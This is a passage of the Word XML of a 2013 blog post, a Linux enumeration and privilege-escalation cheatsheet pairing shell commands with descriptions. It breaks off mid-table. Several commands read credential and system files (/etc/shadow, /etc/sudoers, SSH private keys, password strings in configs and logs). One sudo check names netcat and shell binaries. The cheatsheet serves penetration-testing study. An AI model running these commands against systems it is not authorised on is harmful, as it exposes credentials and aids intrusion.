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3E3C0" w14:textId="77777777" w:rsidR="00245CC9" w:rsidRPr="00245CC9" w:rsidRDefault="00245CC9" w:rsidP="00245CC9">
      <w:pPr>
        <w:spacing w:before="150" w:after="225" w:line="600" w:lineRule="atLeast"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="58"/>
          <w:szCs w:val="58"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00245CC9">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="58"/>
          <w:szCs w:val="58"/>
        </w:rPr>
        <w:t>Local Linux Enumeration &amp; Privilege Escalation Cheatsheet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598506EE" w14:textId="77777777" w:rsidR="00245CC9" w:rsidRPr="00245CC9" w:rsidRDefault="00245CC9" w:rsidP="00245CC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45CC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Posted on </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:tooltip="7:53 am" w:history="1">
        <w:r w:rsidRPr="00245CC9">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="666666"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>June 3, 2013 </w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00245CC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>by </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:tooltip="View all posts by owen" w:history="1">
        <w:r w:rsidRPr="00245CC9">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="666666"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>owen</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5F67AB8E" w14:textId="77777777" w:rsidR="00245CC9" w:rsidRPr="00245CC9" w:rsidRDefault="00245CC9" w:rsidP="00245C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245CC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>The following post lists a few Linux commands that may come in useful when trying to escalate privileges on a target system. This is generally aimed at enumeration rather than specific vulnerabilities/exploits and I realise these are just the </w:t>
      </w:r>
      <w:r w:rsidRPr="00245CC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>tip of the iceberg </w:t>
      </w:r>
      <w:r w:rsidRPr="00245CC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>in terms of what’s available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272D5149" w14:textId="77777777" w:rsidR="00245CC9" w:rsidRPr="00245CC9" w:rsidRDefault="00245CC9" w:rsidP="00245C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245CC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10942A2D" w14:textId="77777777" w:rsidR="00245CC9" w:rsidRPr="00245CC9" w:rsidRDefault="00245CC9" w:rsidP="00245CC9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="360" w:lineRule="atLeast"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00245CC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00245CC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Revision 1.2 (Minor January 2017 update)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F22ACDB" w14:textId="77777777" w:rsidR="00245CC9" w:rsidRPr="00245CC9" w:rsidRDefault="00245CC9" w:rsidP="00245CC9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245CC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Kernel, Operating System &amp; Device Information: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298"/>
        <w:gridCol w:w="5046"/>
      </w:tblGrid>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="768773DC" w14:textId="77777777" w:rsidTr="00245CC9"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4E235B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AF0CB6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245CC9" w:rsidRPr="00245CC9" w14:paraId="426CF93A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74C5A5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uname -a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CF1532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Print all available system information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="168ED13B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A20CA5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uname -r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CC0956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Kernel release</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="4D8B69E2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FD859E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uname -n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FBFFA6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System hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="6CD737DE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69D020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hostname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625157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As above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="196FDB10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872182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uname -m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1D3465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Linux kernel architecture (32 or 64 bit)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="3C1BFF74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33BC84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cat /proc/version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D40DA4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Kernel information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="7BEBAA40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23EBCC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cat /etc/*-release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199EBE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Distribution information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="213D4840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EF412E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cat /etc/issue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A432C9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As above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="38AF1F14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09830F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cat /proc/cpuinfo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F5BF0C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CPU information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="6CDCBCCD" w14:textId="77777777" w:rsidTr="00245CC9"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481570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df -a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6B34FE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File system information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6B43FE14" w14:textId="77777777" w:rsidR="00245CC9" w:rsidRPr="00245CC9" w:rsidRDefault="00245CC9" w:rsidP="00245C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245CC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A773DFA" w14:textId="77777777" w:rsidR="00245CC9" w:rsidRPr="00245CC9" w:rsidRDefault="00245CC9" w:rsidP="00245CC9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245CC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Users &amp; Groups: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298"/>
        <w:gridCol w:w="5046"/>
      </w:tblGrid>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="5F266C8E" w14:textId="77777777" w:rsidTr="00245CC9"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916B46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CD32E5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245CC9" w:rsidRPr="00245CC9" w14:paraId="258D846D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1F7CF8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cat /etc/passwd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0A19D3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List all users on the system</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="20438687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1E1C18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cat /etc/group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289E09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List all groups on the system</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="174366DD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8CB8EA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lastRenderedPageBreak/>
              <w:t>for i in $(cat /etc/passwd 2&gt;/dev/null| cut -d":" -f1 2&gt;/dev/null);do id $i;done 2&gt;/dev/null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9EDAFA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List all uid’s and respective group memberships</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="5E4595AC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CDEF0D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cat /etc/shadow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587320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Show user hashes – </w:t>
            </w:r>
            <w:r w:rsidRPr="00245CC9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Privileged command</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="7A4EA171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8BDBC6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grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'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7B112C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List all super user accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="652604B0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9471CC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finger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DE81CB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Users currently logged in</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="00A217C8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8EB9C3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pinky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796846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As above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="39D57723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76F8AB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users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2EADFD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As above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="146A0590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484458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who -a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72BA82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As above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="761A8975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643436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w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33DFB9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Who is currently logged in and what they’re doing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="7BC0A795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1831C1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last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39BAD1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Listing of last logged on users</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="20F6AC94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EA0029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lastlog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14E735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Information on when all users last logged in</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="4C2DC051" w14:textId="77777777" w:rsidTr="00245CC9"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4778D1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lastlog –u %username%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F2B59A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Information on when the specified user last logged in</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="715166DC" w14:textId="77777777" w:rsidTr="00245CC9"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37C882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lastlog |grep -v "Never"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13D7FB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Entire list of previously logged on users</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5AE40C58" w14:textId="77777777" w:rsidR="00245CC9" w:rsidRPr="00245CC9" w:rsidRDefault="00245CC9" w:rsidP="00245C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245CC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BA6C19" w14:textId="77777777" w:rsidR="00245CC9" w:rsidRPr="00245CC9" w:rsidRDefault="00245CC9" w:rsidP="00245CC9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245CC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>User &amp; Privilege Information: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813"/>
        <w:gridCol w:w="4531"/>
      </w:tblGrid>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="0908017F" w14:textId="77777777" w:rsidTr="00245CC9"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D1FD01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E40E5E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245CC9" w:rsidRPr="00245CC9" w14:paraId="4DA73560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2E1458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whoami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CF3814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Current username</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="720D24AF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B7831C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id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2D9DD7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Current user information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="75FBD685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4536D8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cat /etc/sudoers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56049D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Who’s allowed to do what as root – </w:t>
            </w:r>
            <w:r w:rsidRPr="00245CC9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Privileged command</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="1F964870" w14:textId="77777777" w:rsidTr="00245CC9"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61A433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sudo -l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E52A59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Can the current user perform anything as root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="7A895584" w14:textId="77777777" w:rsidTr="00245CC9"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65BBB0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sudo -l 2&gt;/dev/null | grep -w 'nmap|perl|'awk'|'find'|'bash'|'sh'|'man'</w:t>
            </w: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|'more'|'less'|'vi'|'vim'|'nc'|'netcat'|python</w:t>
            </w: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|ruby|lua|irb' | xargs -r ls -la 2&gt;/dev/null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DE4852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Can the current user run any ‘interesting’ binaries as root and if so also display the binary permissions etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="01A2A018" w14:textId="77777777" w:rsidR="00245CC9" w:rsidRPr="00245CC9" w:rsidRDefault="00245CC9" w:rsidP="00245C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245CC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E46500" w14:textId="77777777" w:rsidR="00245CC9" w:rsidRPr="00245CC9" w:rsidRDefault="00245CC9" w:rsidP="00245CC9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245CC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Environmental Information: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298"/>
        <w:gridCol w:w="5046"/>
      </w:tblGrid>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="477A2153" w14:textId="77777777" w:rsidTr="00245CC9"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039841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F4C018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245CC9" w:rsidRPr="00245CC9" w14:paraId="1C5CE1C2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5D475E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env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87AF4D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Display environmental variables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="137C84B0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4D9F93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set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EFAAE8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As above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="59B93728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FB17D3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echo $PATH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CDC2DB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Path information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="64BAE6A5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85CD14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history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19400B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Displays command history of current user</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="73C4DDB3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2F437F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pwd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3D4D22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Print working directory, i.e. ‘where am I’</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="448476CD" w14:textId="77777777" w:rsidTr="00245CC9"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7A1FC0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cat /etc/profile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20EF2E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Display default system variables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="3BB7DB44" w14:textId="77777777" w:rsidTr="00245CC9"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CE6E11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cat /etc/shells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61599F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Display available shells</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="17638384" w14:textId="77777777" w:rsidR="00245CC9" w:rsidRPr="00245CC9" w:rsidRDefault="00245CC9" w:rsidP="00245C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245CC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB92130" w14:textId="77777777" w:rsidR="00245CC9" w:rsidRPr="00245CC9" w:rsidRDefault="00245CC9" w:rsidP="00245CC9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245CC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Interesting Files: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298"/>
        <w:gridCol w:w="5046"/>
      </w:tblGrid>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="2D943FB2" w14:textId="77777777" w:rsidTr="00245CC9"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3B1E27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00B7B3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245CC9" w:rsidRPr="00245CC9" w14:paraId="55FD136A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5C5832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find / -perm -4000 -type f 2&gt;/dev/null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B0496A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Find SUID files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="01CBFE0C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DEB447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find / -uid 0 -perm -4000 -type f 2&gt;/dev/null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B701C7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Find SUID files owned by root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="7D33B23F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DDC22B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find / -perm -2000 -type f 2&gt;/dev/null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6E9AC2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Find GUID files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="00BE36FA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4A0B2B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find / -perm -2 -type f 2&gt;/dev/null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9B3EA0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Find world-writeable files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="468CB23C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4FC6CD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find / ! -path "*/proc/*" -perm -2 -type f -print 2&gt;/dev/null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8A5FDF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Find world-writeable files excluding those in /proc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="6360454E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9E7D38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find / -perm -2 -type d 2&gt;/dev/null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368384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Find word-writeable directories</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="6D86416D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4F9FD1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find /home –name *.rhosts -print 2&gt;/dev/null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B31701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Find rhost config files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="1E639D9C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88D80D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find /home -iname *.plan -exec ls -la {} ; -exec cat {} 2&gt;/dev/null ;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D54276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Find *.plan files, list permissions and cat the file contents</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="036FA9EF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A21CFF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find /etc -iname hosts.equiv -exec ls -la {} 2&gt;/dev/null ; -exec cat {} 2&gt;/dev/null ;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3F4CBC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Find hosts.equiv, list permissions and cat the file contents</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="3BE05372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D6DCEF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lastRenderedPageBreak/>
              <w:t>ls -ahlR /root/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E6B5FB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See if you can access other user directories to find interesting files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="595FADEE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EE2085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cat ~/.bash_history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625B91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Show the current users’ command history</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="6992ED24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A05ECC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ls -la ~/.*_history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61A210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Show the current users’ various history files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="23AA1B6C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A07A29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ls -la /root/.*_history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7B48F1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Can we read root’s history files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="51A55DCE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EAB7DB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ls -la ~/.ssh/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9C1A2E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Check for interesting ssh files in the current users’ directory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="52DFFAB7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0C94DB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find / -name "id_dsa*" -o -name "id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" 2&gt;/dev/null |xargs -r ls -la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B77A6A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Find SSH keys/host information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="1F03F64A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A21FE2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ls -la /usr/sbin/in.*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AE2666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Check Configuration of inetd services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="3BA966BF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0C498C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grep -l -i pass /var/log/*.log 2&gt;/dev/null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6E89CD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Check log files for keywords (‘pass’ in this example) and show positive matches</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="2B0AFA02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D78F17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find /var/log -type f -exec ls -la {} ; 2&gt;/dev/null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99602A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List files in specified directory (/var/log)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="40DC7F14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25F4E4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find /var/log -name *.log -type f -exec ls -la {} ; 2&gt;/dev/null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30CAAF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List .log files in specified directory (/var/log)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="3E08C0D4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04047F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find /etc/ -maxdepth 1 -name *.conf -type f -exec ls -la {} ; 2&gt;/dev/null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2D5AFF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List .conf files in /etc (recursive 1 level)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="1E477399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DA56D6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ls -la /etc/*.conf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423713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As above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="0D096B44" w14:textId="77777777" w:rsidTr="00245CC9">
        <w:trPr>
          <w:trHeight w:val="360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2A880E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find / -maxdepth 4 -name *.conf -type f -exec grep -Hn password {} ; 2&gt;/dev/null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B258E8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Find .conf files (recursive 4 levels) and output line number where the word ‘password’ is located</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="65AF2E39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64BEE9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lsof -i -n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FCB4C1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List open files (output will depend on account privileges)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="6B7988EC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8D1FF2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head /var/mail/root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0F3539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Can we read roots mail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3086AEEF" w14:textId="77777777" w:rsidR="00245CC9" w:rsidRPr="00245CC9" w:rsidRDefault="00245CC9" w:rsidP="00245C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245CC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F1E190" w14:textId="77777777" w:rsidR="00245CC9" w:rsidRPr="00245CC9" w:rsidRDefault="00245CC9" w:rsidP="00245CC9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245CC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Service Information: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298"/>
        <w:gridCol w:w="5046"/>
      </w:tblGrid>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="3B1D315B" w14:textId="77777777" w:rsidTr="00245CC9"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6729E2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BE6B0B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245CC9" w:rsidRPr="00245CC9" w14:paraId="50471AB3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FB37EA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lastRenderedPageBreak/>
              <w:t>ps aux | grep root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9CED43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Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>View services running as root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="45B98D63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D82C6D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ps aux | awk '{print $11}'|xargs -r ls -la 2&gt;/dev/null |awk '!x[$0]++'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2D44E9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Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Lookup process binary path and permissions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="4F4CDE98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71FAA2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cat /etc/inetd.conf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A919BB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Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>List services managed by inetd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="3A95C3AA" w14:textId="77777777" w:rsidTr="00245CC9"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0447E2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cat /etc/xinetd.conf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468629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Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>As above for xinetd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
